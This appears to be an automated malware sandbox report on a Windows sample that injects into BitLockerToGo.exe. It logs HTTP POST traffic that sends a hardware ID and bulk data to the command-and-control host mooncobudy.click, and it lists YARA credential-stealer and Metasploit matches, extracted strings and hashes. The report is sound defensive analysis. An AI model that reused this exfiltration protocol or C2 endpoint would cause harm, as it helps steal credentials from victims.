2025-01-07 12:19:38 UTC | 12845 | OUT | Data Raw: 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 59 36 32 46 49 38 31 30 5a 46 37 59 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 31 59 36 32
Data Ascii: --1Y62FI810ZF7YOAContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--1Y62FI810ZF7YOAContent-Disposition: form-data; name="pid"2--1Y62FI810ZF7YOAContent-Disposition: form-data; name="lid"Jwquln--3112YT--1Y62
2025-01-07 12:19:40 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=hm1foaap4th46rt1c059gcske2; expires=Sat, 03 May 2025 06:06:18 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ujEDUJcNzQ58nfJY9X5sQic95zqJnxpScs4fnBF8CzWdmEONfVg9u8XR%2B8bRG0K7U3EBe66qPexnb1CSILWxsPlwsOESEO0PZZSgxGQU5438EMh%2BNF2ykwYsGIc9H7FgH2f"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5b75f6bf795-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1435&rtt_var=556&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13782&delivery_rate=1937624&cwnd=187&unsent_bytes=0&cid=83079e736b927d99&ts=1483&x=0"
                                                                              2025-01-07 12:19:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.3 | 49944 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2025-01-07 12:19:40 UTC278OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=WJMOPOOATFMWBH
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12087
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:40 UTC12087OUTData Raw: 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f 41 54 46 4d 57 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 57 4a 4d 4f 50 4f 4f
                                                                              Data Ascii: --WJMOPOOATFMWBHContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--WJMOPOOATFMWBHContent-Disposition: form-data; name="pid"2--WJMOPOOATFMWBHContent-Disposition: form-data; name="lid"Jwquln--3112YT--WJMOPOO
                                                                              2025-01-07 12:19:41 UTC1132INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=m4v6i7g8uviegjljbe1b7gdhbv; expires=Sat, 03 May 2025 06:06:20 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG9idbXh5KKlk%2Fa%2B4nitMb3ss00IDWGLy2%2Bw8vo4Fqonu3knJdC6AedPG3nLA5A5BMP%2BknKmLDGGpR6CDI32nX%2BHZVm8YF8ECQXHtOz91284KZwWdVZL%2F4VYuZ1%2FthJ96jEi"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5c47bba4366-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1566&rtt_var=599&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2841&recv_bytes=13023&delivery_rate=1810291&cwnd=200&unsent_bytes=0&cid=fcebc12ef4a2d653&ts=658&x=0"
                                                                              2025-01-07 12:19:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.3 | 49951 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2025-01-07 12:19:42 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=RS0CM4VYQD4PSF2G
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20445
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:42 UTC15331OUTData Raw: 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 53 30 43 4d 34 56 59 51 44 34 50 53 46 32 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 52
                                                                              Data Ascii: --RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="pid"3--RS0CM4VYQD4PSF2GContent-Disposition: form-data; name="lid"Jwquln--3112YT--R
                                                                              2025-01-07 12:19:42 UTC1123INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=tpoqqqtk2c03hhkopcn3h4s1n6; expires=Sat, 03 May 2025 06:06:21 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToEdqivOANdXFWxHuotLCbN4FpOiMfSyk6PGPQbnRkkRhnrVV13%2F0MQcy0YMnF0S32NqIHpizYadHPuRQomIi6rfMa6LPTiHNeUUR79AXnyIepseSZUcvS1JKlKzE8%2FeAwdB"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5ccca5343b7-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=1997&rtt_var=762&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21405&delivery_rate=1423695&cwnd=238&unsent_bytes=0&cid=98bd7e2abeeadd70&ts=621&x=0"
                                                                              2025-01-07 12:19:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.3 | 49963 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2025-01-07 12:19:43 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=JF9DUC2BWPQ1ZFPQO
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1231
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:43 UTC1231OUTData Raw: 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 46 39 44 55 43 32 42 57 50 51 31 5a 46 50 51 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a
                                                                              Data Ascii: --JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="pid"1--JF9DUC2BWPQ1ZFPQOContent-Disposition: form-data; name="lid"Jwquln--3112YT
                                                                              2025-01-07 12:19:44 UTC1122INHTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=62da4iv4940o8brt7g5mu9kh4i; expires=Sat, 03 May 2025 06:06:23 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRI4FxIbRRGbPWKqHPWaG41IQkHXMF0AeqxQjidt3uYCvOY69X84yf9hUPHgqCWaM5gBmHf7QVj7S5fpcTcnYkggj10kTcVuA1MDE%2BWYZC5yGn%2Be%2BgxUlZbO11QSPphnTz0R"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5d70a9d7ca5-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1755&rtt_var=683&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2147&delivery_rate=1574123&cwnd=243&unsent_bytes=0&cid=ef7a29fe50174743&ts=497&x=0"
                                                                              2025-01-07 12:19:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2025-01-07 12:19:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.3 | 49973 | 188.114.97.3 | 443 | 7912 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2025-01-07 12:19:45 UTC274OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=GVWKJB737
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 562220
                                                                              Host: mooncobudy.click
                                                                              2025-01-07 12:19:45 UTC15331OUTData Raw: 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 30 44 33 36 35 46 35 38 41 37 42 33 32 32 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 33 31 31 32 59 54 0d 0a 2d 2d 47 56 57 4b 4a 42 37 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                              Data Ascii: --GVWKJB737Content-Disposition: form-data; name="hwid"FC0D365F58A7B32220A4C476FD51BCB1--GVWKJB737Content-Disposition: form-data; name="pid"1--GVWKJB737Content-Disposition: form-data; name="lid"Jwquln--3112YT--GVWKJB737Content-Dis
                                                                              2025-01-07 12:19:46 UTC 1127 IN HTTP/1.1 200 OK
                                                                              Date: Tue, 07 Jan 2025 12:19:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e6crsrgbt33fo07clakaefvas1; expires=Sat, 03 May 2025 06:06:25 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8WOo0nVyRQKY7DwX04aRsKbgGB8nuAZUgVeVGu3ipeWybgxhmKA9SAYQGxHdYQsnr5Rn3WpquG21uDLCOH%2FoNa1D7aq7qxmGO%2B7EgttITxPeQrFzG829TBWCVhLHDknUBLm"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fe3e5e07b2043a4-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2380&rtt_var=937&sent=194&recv=578&lost=0&retrans=0&sent_bytes=2841&recv_bytes=564736&delivery_rate=1141070&cwnd=232&unsent_bytes=0&cid=3b43c29ac8d8a881&ts=1655&x=0"



                                                                              Target ID:0
                                                                              Start time:07:19:05
                                                                              Start date:07/01/2025
                                                                              Path:C:\Users\user\Desktop\64pOGv7k4N.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\64pOGv7k4N.exe"
                                                                              Imagebase:0xab0000
                                                                              File size:3'805'184 bytes
                                                                              MD5 hash:A56FC11692AB8BAF7F9E3B80540D63C5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:07:19:31
                                                                              Start date:07/01/2025
                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                              Imagebase:0x8e0000
                                                                              File size:231'736 bytes
                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AD7305
                                                                                • runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:, xrefs: 00AD77E4
                                                                                • bad summary databad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemess, xrefs: 00AD735C, 00AD7AEE
                                                                                • , i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySy, xrefs: 00AD7811
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AD72B1, 00AD72DB, 00AD76DA, 00AD7704
                                                                                • , j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarN, xrefs: 00AD7799
                                                                                • , levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceEastern , xrefs: 00AD7899
                                                                                • ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5, xrefs: 00AD725C, 00AD7685
                                                                                • runtime: npages = runtime: range = {runtime: textAddr segmentation faultsequence truncatedstreams pipe errorsystem page size (tracebackancestorstruncated sequenceuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp-, xrefs: 00AD7325
                                                                                • , npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLibraryGOTRACE, xrefs: 00AD776C
                                                                                • runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AD773D
                                                                                • runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning boolea, xrefs: 00AD786C
                                                                                • ] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+, xrefs: 00AD76B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-994956587
                                                                                • Opcode ID: b4174de4a65283a9636c29ac80391ae45c289f3c892c5d3be3b4accbce32fa1d
                                                                                • Instruction ID: de0bb72da727dd9076a62d9c66143c5d6fb4649c4b516d2d4af8f9992150aa5f
                                                                                • Opcode Fuzzy Hash: b4174de4a65283a9636c29ac80391ae45c289f3c892c5d3be3b4accbce32fa1d
                                                                                • Instruction Fuzzy Hash: 41527A75A087448FD324EF69D58176EBBE1FFC8304F50892EE99A87341E774A844DB42
                                                                                Strings
                                                                                • heapBitsSetType: unexpected shiftindefinite length found (not DER)leafCounts[maxBits][maxBits] != nmin must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func t, xrefs: 00AC1BC8
                                                                                • heapBitsSetType: called with non-pointer typenot a valid PE signature. Probably an LE filenot a valid PE signature. Probably an LX fileoffset %d is before the start of string tableparsing/packing of this section has completedpkcs7: failed to verify certificate, xrefs: 00AC1C35
                                                                                • -, xrefs: 00AC1C3E
                                                                                • runtime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too man, xrefs: 00AC1BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-1036788876
                                                                                • Opcode ID: 0d99a794d1e9ce1fdfaf91b47f49807b435074a4883ee91bc3ce1bdd09ef3c14
                                                                                • Instruction ID: b84c8e9f19c1cfebb568044644f3e985e7848ff05d8e21957563f96e8f3c5019
                                                                                • Opcode Fuzzy Hash: 0d99a794d1e9ce1fdfaf91b47f49807b435074a4883ee91bc3ce1bdd09ef3c14
                                                                                • Instruction Fuzzy Hash: B3626071A083958FD725DF69C480B5EF7E2BBCA300F16896EE89997342D7709D05CB82
                                                                                Strings
                                                                                • min must be a non-zero power of 2misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of r, xrefs: 00AD0ABF
                                                                                • min too largenil stackbaseout of memoryparsing time powrprof.dll, xrefs: 00AD0A70
                                                                                • runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AD0A3C, 00AD0A8B
                                                                                • !, xrefs: 00AD0AC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
